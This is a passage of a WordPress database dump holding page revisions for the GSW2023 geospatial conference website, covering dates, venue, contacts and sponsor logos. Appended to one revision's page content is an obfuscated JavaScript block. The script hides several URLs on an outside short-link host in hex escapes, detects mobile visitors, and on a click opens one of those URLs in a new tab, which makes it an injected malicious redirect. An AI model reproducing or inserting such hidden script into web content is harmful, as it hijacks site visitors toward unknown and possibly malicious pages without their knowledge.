button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-20 00:10:10','2023-06-20 00:10:10','',3066,'https://gsw2023.com/?p=4722',0,'revision','',0),
(4723,1,'2023-06-20 00:11:09','2023-06-20 00:11:09','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219801917{margin-top: 10px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: 